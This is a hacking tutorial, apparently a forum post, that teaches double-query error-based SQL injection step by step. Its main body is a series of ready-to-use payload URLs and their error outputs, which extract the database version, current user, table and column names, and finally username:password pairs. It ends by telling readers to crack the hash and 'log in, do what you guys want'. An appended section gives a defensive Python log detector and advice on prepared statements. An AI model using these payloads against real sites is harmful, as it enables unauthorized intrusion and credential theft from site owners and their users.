SQL Injection [Double Query Error Based]

Asalam O Alaikum

This tutorial is about how to hack a website through double-query error-based SQL injection.

For this you first need a vulnerable site.

OK, after getting a vulnerable site, get the column count as normal.

Suppose it has 4 columns, so your next command will be:

Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
But when you press Enter, it gives an error.

The error is:
Code:
(select statement have different numbers of column)

So now what?

Don't be confused; it's time to use double-query SQL injection.

Your command will look like this:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

And the result will look like this:

Code:
"Duplicate entry '5.0.92-community-log1' for key 1"

So here '5.0.92-community-log1' is the site's version.


Now we have to find the site's current_user, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)


Result:
Code:
"Duplicate entry 'user+1' for key 1"


OK, now we will find the tables with this command:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

The result should be:
Code:
"Duplicate entry 'table_name1' for key 1"

Now keep increasing the limit; you can find it here:
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
Here, change the limit from 0,1 to 1,1, then 2,1, and so on until you get the error.


OK, now we will find the tables that contain the data, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

Result:
Code:
"Duplicate entry 'tablename1' for key 1"

Here again, increase the limit value until you get a table like user, admin, login, etc.

OK, now suppose we have the table name "user"; the next step is to find the columns of this table. Our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

Result:
Code:
"Duplicate entry 'column name1' for key 1"

You can convert text to hex here: http://www.swingnote.com/tools/texttohex.php

Again, keep changing the limit value until you get columns like username, password, etc.

OK, now we have the columns username and password; we need the data inside those columns, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

Result:
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
If the password is hashed, you have to crack the hash.
You can crack it with a site, namely:
Code:
http://md5decrypter.co.uk
Now that you have the username and password, log in, do what you guys want, and enjoy.

POSTED BY HASAN AFAQUE (Admin)
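
From the defender's side, every request in this tutorial has the same shape (count(*), floor(rand(0)*2) and GROUP BY inside the id parameter), and every success shows up as a "Duplicate entry ... for key" error in the response. The Python sketch below is an added example, not part of the original post: it flags that shape in access-log lines and extracts what an error page disclosed. The log lines are constructed samples and all function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Fragments that recur in every double-query request shown in this tutorial.
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by"),
    "info_schema": re.compile(r"information_schema\s*\.\s*(tables|columns)"),
}
LEAK = re.compile(r"duplicate entry '?(.*?)'? for key", re.I)  # error echoed on success

def normalize(text):
    """URL-decode until stable, drop zero-width spaces, squeeze whitespace, lowercase."""
    prev = None
    while prev != text:
        prev, text = text, unquote_plus(text)
    return re.sub(r"\s+", " ", text.replace("\u200b", "")).lower()

def score_request(request):
    """Sorted names of the signatures present in one request line."""
    text = normalize(request)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def is_double_query(request):
    """floor(rand()*2) together with count(*) and GROUP BY is the core shape."""
    return {"rand_floor", "count_star", "group_by"} <= set(score_request(request))

def leaked_value(response_body):
    """Value disclosed by a 'Duplicate entry' error, minus the appended 0/1 digit."""
    m = LEAK.search(response_body)
    return re.sub(r"[01]$", "", m.group(1)) if m else None

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    "GET /index.php?id=12 HTTP/1.1",
    "GET /index.php?id=-12+and+(select+1+from(select+count(*),concat((select+"
    "version()),floor(rand(0)*2))a+from+information_schema.tables+group+by+a)b) HTTP/1.1",
    "GET /index.php?id=-12%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(current_user(),"
    "FLOOR(RAND(0)*2))a%20FROM%20information_schema.tables%20GROUP%20BY%20a)b) HTTP/1.1",
]

def flag_lines(lines):
    """Indexes of the log lines that match the double-query shape."""
    return [i for i, line in enumerate(lines) if is_double_query(line)]

if __name__ == "__main__":
    print(flag_lines(SAMPLE_LOG))
    print(leaked_value("Duplicate entry '5.0.92-community-log1' for key 1"))
```

Detection only tells you it happened; the fix is to bind id as a parameter in a prepared statement and to stop returning database error text to the client.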
